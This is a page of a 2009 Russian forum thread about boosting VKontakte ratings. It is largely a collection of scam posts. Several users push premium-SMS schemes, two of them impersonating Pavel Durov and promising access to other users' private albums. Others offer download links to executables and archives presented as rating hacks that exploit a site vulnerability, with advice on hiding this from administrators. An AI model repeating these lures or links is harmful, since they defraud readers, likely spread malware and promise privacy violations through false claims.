Create site free
вконтакте форум
[ Новые сообщения · Участники · Правила форума · Поиск · RSS ]
Страница 12 из 16«1210111213141516»
Модератор форума: smoki, kara 
вконтакте форум » Все о сайте вконтакте » Рейтинг » Повышаем рейтинг вконтакте
Повышаем рейтинг вконтакте
No_More_SorroW Дата: Понедельник, 09.03.2009, 12:25 | Сообщение # 166
прохожий
Статус: Offline
dj0ker
Что ето за фигня... на такое тока ЛОХ поведьоца es

kuzen111 Дата: Понедельник, 09.03.2009, 15:49 | Сообщение # 167
прохожий
ну не знаю, я ток один раз напоролась не на развод, но очень уж сильно обнаглела и администрация мою страничку удалила... сейчас новая... кому интересно, прогу скачивала здесь:
reytingvkontakte.exe

DYROV Дата: Вторник, 10.03.2009, 21:05 | Сообщение # 168
новичок
Чтоб стать “V~I~P” отправте СМС сообщение с текстом [id20383918] (без квадратных скобок) по номеру [1046 или 1045 или 4280.]

В ответ вам прийдёт сooбщения в нём будет пaрoль который нужно будет веcти при входе на сайт вместо прежнего.

После этого полоска рейтинга станет золотого цвета, на вашей аватарке появится статус ”V~I~P” и ваша страничка будет отображаться на первых местах в поиске. А также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!!
Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
1смс - 2% V I P статус !

Стоимость собщения [0.45 грн] или [3 руб]
C Ув. Павел Дуров

Xoxol333 Дата: Среда, 11.03.2009, 17:31 | Сообщение # 169
новичок
о_О ewi

DYROV Дата: Четверг, 12.03.2009, 23:28 | Сообщение # 170
новичок
Чтоб стать “V~I~P” отправте СМС сообщение с текстом [id20383918] (без квадратных скобок) по номеру [1046 или 1045 или 4280.]

В ответ вам прийдёт сooбщения в нём будет пaрoль который нужно будет веcти при входе на сайт вместо прежнего.

После этого полоска рейтинга станет золотого цвета, на вашей аватарке появится статус ”V~I~P” и ваша страничка будет отображаться на первых местах в поиске. А также Вам станут доступны для просмотра альбомы и видеозаписи всех пользователей, даже закрытые настройками приватности. Спешите предложение ограничено!!!
Если рейтинг не пришел в течении 10 минут то отправьте повторное сообщение, оно бесплатно!
1смс - 2% V I P статус !

Стоимость собщения [0.45 грн] или [3 руб]
C Ув. Павел Дуров ex ex ex ex ex ex ex ex ex ex ex ex ex ex ex

Antana Дата: Пятница, 13.03.2009, 14:47 | Сообщение # 171
прохожий
http://letitbit.net/downloa....ar.html

Программа VkontakteRatingMaster - это уникальная разработка, позволяющая не прилагая особенных усилий, постоянно получать на свою страницу Вконтакте голоса, которые впоследствии можно использовать для поднятия рейтинга а также для отправки подарков.
Как это работает?

Принцип использования VkontakteRatingMaster основан на уязвимости, позволяющей получать информацию о свободных голосах рейтинга посетителей Вконтакте.

Программа разделена на две части: серверную и клиентскую. На серверной базе постоянно работают пять высокопроизводительных серверов с широкополосным интернетом, которые круглосуточно собирают информацию обо всех пользователях сети Вконтакте и наличии у них неиспользованных голосов рейтинга. Один раз в месяц базы сжимаются до коротких заголовков и выкладываются для пользователей программы.

Клиентская часть программы VkontakteRatingMaster устанавливается на ваш компьютер, сканирует подготовленную базу пользователей и посылает запросы на главный сервер. При наличии свободных голосов, программа "передает" их на вашу страницу сети Вконтакте. При этом тратится очень мало траффика (около 30 мб./сутки!)

В среднем, за сутки работы находится около 700 голосов, то есть, при стоимости 1 голоса рейтинга около 10 рублей, за сутки вы сможете набрать голосов на 7 тыс.рублей!

Создатели постоянно работают над улучшением эффективности программы, в ближайших планах находится увеличение пробива до 1500 голосов в сутки.

Для работы необходима сжатая база пользователей.

yarik249 Дата: Пятница, 13.03.2009, 16:00 | Сообщение # 172
прохожий
Реально РЕЙТИНГ отправте СМС сообщение с текстом id22941629 на номер 4444!
Стоимость собщения Для Украины 0.25 грн Для России1.50 руб! em

dj0ker Дата: Суббота, 14.03.2009, 08:33 | Сообщение # 173
тихоня
Люди всегда стремились быть первыми среди остальных, в том числе и в социальных сетях. Чем в свою очередь владельцы последних с удовольствием пользуются, зарабатывая на этом миллионы.
Многие пользователи социальной сети вконтакте.ру задавались вопросом, откуда такой рейтинг у того или иного участника. Многие хотят попасть в топ контакта, но теперь это сделать еще труднее.
Ранее для поднятия рейтинга использовался фрод, т.е. обман сотового оператора путем списывания с сим карты большего баланса, чем на самом деле там есть.
Теперь вам не понадобится обманывать оператора сотовой связи.
Вам достаточно просто воспользоваться программой!
Только рекомендуем вам не повышать за один раз рейтинг более чем на 500. l_sunny
Чтобы администрация сайта ничего не заподозрила
http://video.makewap.ru/download/files/reyting_vkontakte.zip
viannen_01 viannen_01 viannen_01 viannen_01 viannen_01

TemaTrix Дата: Вторник, 17.03.2009, 13:30 | Сообщение # 174
прохожий
Есть много информации на разных форумах про так называемого "БОТА ДЛЯ ПОВЫШЕНИЯ РЕЙТИНГА ВКОНТАКТЕ".
Я сам не верил пока сам в этом не убедился, что он на самом деле существует. Есть такие идиоты которые
тупо втирают про БОТА а потом вставляют свой ID(якобы это ID бота) и на него нужно отправить СМС. НИКОГДА НЕ ВЕРЬТЕ ТАКИМ РАЗВОДАМ!!!
И так перейдём к делу... У меня есть друг, хакер, он нашёл этого бота вручную. Если не верите можете убедиться в этом,
вот адрес странички самого бота: http://vkontakte.ru/id32080874, можете не пытаться отправить ему сообщение или добавить в друзья)) это безполезно.
Нужно отправить СМС с c текстом id32080874(айдишник бота) на номер 4444(10 голосов) или 4449(20 голосов)- это номера для операторов УКРАИНЫ и других стран,
для операторов РОССИИ, следующие номера 1045(10 голосов) 1046(20 голосов). Рекомендую вам отправлять сразу на 4449, потому что многие жалуються что им
не приходит ответное сообщение. В ответ вам прийдёт "КОД" который вы должны отправить по контакту, самому БОТУ. Таким образом вы получаете голоса. Система проста.
СМС как бы это странно не казалось-СОВЕРШЕННО БЕСПЛАТНЫЕ.
Для этого и существует бот. Только желательно СМС отправлять не чаще 3-х раз в сутки, что бы не перегружать систему.
НАДЕЮСЬ МОЯ МАЛЕНЬКАЯ СТАТЬЯ ПОМОГЛА ВАМ... УДАЧИ !!! Я знаю, у вас возник один вопрос, НАХРЕНА Я ЗАКИНУЛ ЭТУ СТАТЬЮ НА ФОРУМ? Я отвечу,
Потому что мне не нужна никакая выгода из этого и я не хочу продавать голоса, денег мне хватает, просто хочу помочь... если чесно от хефиг делать))))
Деньги снимает только за НДС в зависимости от оператора связи! viannen_01

Sn1peR Дата: Суббота, 21.03.2009, 16:35 | Сообщение # 175
прохожий
Здравствуйте, дочитайте пожалуйста это сообщение до конца. Это не лохотроны типо отправьте сообщение на этот номер с таким то id (как правило id того, кто пишит это вам), нет.
Предлагаю вашему вниманию способ повышения рейтинга с очень маленькими затратами ~30 руб (то есть стоимость трёх голосов, заказанных при помощи СМС). Спрашиваете зачем мне это надо, отвечу : личная неприязнь к Дурова. Когда тока открывался ВКонтакте я начал ломать его (сайт) и дуров забанил меня на нём, позже я сменил IP и вот я с вами=) хотя с другой стороны мне надо сказать ему спасибо, ведь именно благодаря ему я стал так называемым хакером, я же предпочитаю называться интернет-программистом=)
И так начнём. Сейчас я вам представлю шаги, следуя по которым вы сможете поднять себе рейтинг:
1) Отправте СМС со своим id на номер 1045 ( тем самым вы получаете 3 голоса на своей странице ВКонтакте, расценки отправки СМС на http://vkontakte.ru/payments.php?act=sms ) они нужны для того, чтобы при взломе рейта на вашей странице моей прогой - она (прога) голосовала за вас этими 3-мя голосами, просто изменив при отправлении пакета html сигналов с вашей страници число 3 на выбранное вами число(Если у вас уже есть на странице от 3 и больше неиспользованных голосов, то смело переходите к следующему пункту (прога использует только 3 голоса))
2) После того, как у вас на странице справа появилась надпись “У Вас 3 неиспользованных голосов” – качайте, разработанную мной программу для повышения рейтинга отсюда ~> http://depositfiles.com/files/i17ohd20s ПРИМЕЧАНИЕ: не пользуйтесь программой, пока голоса не появятся на вашей странице.
3) После того, как вы закачаете программу (весит она всего 767 КБ), запустите её, заполните все поля верной информацией о вашей странице и выберите нужное вам количество рейтинга (советую набирать за 1 раз не более 50 %, иначе админы сайта ВКонтакте могут пропалить то , что вы повышаете рейтинг незаконно) и жмите клавишу “Поднять”
4) В течении 5 минуты ваш рейтинг должен подняться на выбранное вами количество %. О счастье=)
Если вы хотите поднять свой рейтинг ещё. То повторите всю процедуру с первого шага, за исключением “скачать программу” конечно=)
Почему вы можете мне доверять:
1) Вы не высылаете мне свои данные (и-мэйл и пороль), то есть я не преследую цель получить доступ к вашей странице и уж поверьте, если б я хотел взломать вашу страницу, я б взломал и вы бы даже не узнали ;)
2) Вы не высылаете СМС с чужым id , а в лубом случае получаете эти 3 голоса на свою страницу, я не прошу высылать голоса на мою страницу. <p> Да и вообще на самом деле решать вам пользоваться моей прогой или нет, как говорится моё дело предложить…
С уважением HaCkeR Sn1peR. По всем вопросам вы можете обратиться на e-mail sn1per@mail.ru или ICQ 405118970

Сообщение отредактировал Sn1peR - Суббота, 21.03.2009, 16:45

reyting Дата: Воскресенье, 22.03.2009, 15:08 | Сообщение # 176
новичок
Новейшая программа v.i.p. mixers® [VK] созданная проффесиональными-хакерами ,даёт вам повышение рейтинга. Ее можно купить отправив смс с текстом id17294581 на короткий номер 1046

Кто не верит / моя страница вот - http://vkontakte.ru/id9353272

madgahed55 Дата: Понедельник, 23.03.2009, 18:00 | Сообщение # 177
новичок
Всем привет.Кто заинтересован о поднятии рейтинга вконтакте,могу
с этим помочь.Я перечисляю рейтинг за определенную плату.1$-12 голосов
(если договориться,то могу голосов подбавить).Оплата производится через
Web Money.Не кидаю,все чесно.Если есть заинтересовавшиеся пишите в аську
488367950

111111 Дата: Пятница, 03.04.2009, 13:03 | Сообщение # 178
прохожий
качать тут
скачайте программу для повышения рейдинга с телефона! Програмка очень проста в использовании-скачайте файл,закиньте на телефон,настройте интернэт,откройте прогу и нажимайте да до тех пор пока не появица строчка (введите свой id) в день спакойно накручует 140 голосов! Удачи

Сообщение отредактировал 111111 - Пятница, 03.04.2009, 15:08

KoksrusSiA Дата: Суббота, 18.04.2009, 13:56 | Сообщение # 179
новичок
Да нах оно нужно?! Мне и так не плохо живется)))

morgan Дата: Пятница, 01.05.2009, 11:00 | Сообщение # 180
прохожий
да.....ребята есть токо один реальный способ повысить рейт бесплатно!
85414149 стучине могу пример работ скинуть=)

вконтакте форум » Все о сайте вконтакте » Рейтинг » Повышаем рейтинг вконтакте
Страница 12 из 16«1210111213141516»
Поиск: